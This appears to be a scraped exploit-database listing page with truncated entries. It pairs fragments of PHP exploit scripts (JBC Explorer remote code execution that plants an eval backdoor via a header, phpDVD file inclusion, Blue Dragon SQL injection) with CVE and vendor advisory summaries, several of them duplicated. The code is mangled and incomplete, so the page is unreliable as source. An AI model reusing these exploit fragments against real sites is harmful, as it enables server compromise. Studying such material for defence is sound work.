JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit

No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; head; if$argc 3 usage; $url = getparam'url', true; $prx = getparam'proxy', false; $pra = getparam'proxyauth', false; $cod = 'eval$SERVERHTTPSHELL;'; $xpl = new phpsploit; $xpl-agent'Mozilla Firefox';...

jbcexplorer-exec.txt

!/usr/bin/php agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php"; $xpl-post$url.'dirsys/modules/auth.php', 'suppr=1'; print "\n0x02Creating the file auth.inc.php";...

JBC Explorer <= 7.20 RC 1 Remote Code Execution Exploit

Exploit for unknown platform in category web applications ======================================================= JBC Explorer agent'Mozilla Firefox'; $xpl-allowredirection1; $xpl-cookiejar1; if$prx $xpl-proxy$prx; if$pra $xpl-proxyauth$pra; print "0x01Deleting the file auth.inc.php";...

CVE-2002-2405

CVE-2002-2405 affects Check Point FireWall-1 4.1 and NG when UserAuth is configured to proxy HTTP traffic only, permitting remote attackers to pass unauthorized HTTPS, FTP and possibly other traffic through the firewall. The root cause and actionable remediation details are not provided in the co...

3proxy double free vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 3proxy double free vulnerability Security Advisory Advisory: ADLAB-07006 3proxy double free vulnerability Class: Design Error DATE:10/22/2007 CVEID:CVE-2007-5622 Vulnerable: 3proxy =0.5.3i Vendor: http://www.3proxy.ru/ I.Synopsis A vulnerability has...

Mozilla Foundation Security Advisory 2007-31

Mozilla Foundation Security Advisory 2007-31 Title: Digest authentication request splitting Impact: Moderate Announced: October 18, 2007 Reporter: Stefano Di Paola Products: Firefox, SeaMonkey Fixed in: Firefox 2.0.0.8 SeaMonkey 1.1.5 Description Security researcher Stefano Di Paola reported that...

Digest authentication request splitting — Mozilla

Security researcher Stefano Di Paola reported that Firefox did not properly validate the user ID when making an HTTP request using Digest Authentication to log into a web site. A malicious page could abuse this to inject arbitrary HTTP headers by including a newline character in the user ID...

elinks security update

CentOS Errata and Security Advisory CESA-2007:0933 An updated ELinks package that corrects a security vulnerability is now available for Red Hat Enterprise Linux 4 and 5. This update has been rated as having moderate security impact by the Red Hat Security Response Team. ELinks is a text mode Web...

Moderate: Red Hat Security Advisory: elinks security update

An updated ELinks package that corrects a security vulnerability is now available for Red Hat Enterprise Linux 4 and 5. This update has been rated as having moderate security impact by the Red Hat Security Response Team. ELinks is a text mode Web browser used from the command line that supports...

Debian DSA-1380-1 : elinks - programming error

Kalle Olavi Niemitalo discovered that elinks, an advanced text-mode WWW browser, sent HTTP POST data in cleartext when using an HTTPS proxy server potentially allowing private information to be disclosed. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks...

USN-519-1: elinks vulnerability

Kalle Olavi Niemitalo discovered that if elinks makes a POST request to an HTTPS URL through a proxy, information may be sent in clear-text between elinks and the proxy. Attackers with access to the network could steal sensitive information such as passwords...

CVE-2007-5034

ELinks before 0.11.3, when sending a POST request for an https URL, appends the body and content headers of the POST request to the CONNECT request in cleartext, which allows remote attackers to sniff sensitive data that would have been protected by TLS. NOTE: this issue only occurs when a proxy ...

CVE-2007-5034

ELinks before 0.11.3, when sending a POST request for an https URL, appends the body and content headers of the POST request to the CONNECT request in cleartext, which allows remote attackers to sniff sensitive data that would have been protected by TLS. NOTE: this issue only occurs when a proxy ...

CVE-2007-5034

ELinks before 0.11.3, when sending a POST request for an https URL, appends the body and content headers of the POST request to the CONNECT request in cleartext, which allows remote attackers to sniff sensitive data that would have been protected by TLS. NOTE: this issue only occurs when a proxy ...

CVE-2007-3847

The date handling code in modules/proxy/proxyutil.c modproxy in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service caching forward proxy process crash via crafted date headers that trigger a buffer over-read...

CVE-2007-3847

The date handling code in modules/proxy/proxyutil.c modproxy in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service caching forward proxy process crash via crafted date headers that trigger a buffer over-read...

phpDVD v1.0.4 &#40;dvd_config_file&#41; Remote File Include Exploit

!/usr/bin/php -q -d shortopentag=on ? print ' //'=============================================================================================== //'Script : phpDVD v1.0.4 //'Author : iLker Kandemir ilkerkandemiratmynet.com //'S.Page : http://ugo.scarlata.it/phpdvd/phpDVD-1.0.4.tar.gz //'Dork :...

Php Blue Dragon CMS 3.0.0 Remote SQL Injection Exploit

No description provided by source. ? // Exploit Name: Php Blue Dragon CMS 3.0.0 Remote SQL Injection Exploit //Script Homepage: http://phpbluedragon.pl/ // Autor: Kacper [email protected] // Autor Homepage: devilteam.eu | kacper.bblog.pl //Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na...

AV Tutorial Script 1.0 - Remote User Pass Change

AV Tutorial Script 1.0 - Remote User Pass Change 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string...

mycms-exec.txt

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argcNo new score set"; elseif $score $data $file1 = "snakescore.txt"; $file2 = "snakesetby.txt"; $file1h = fopen$file1, 'w' or die"can't open file"; $file2h = fopen$file2, 'w' or die"can't open file"...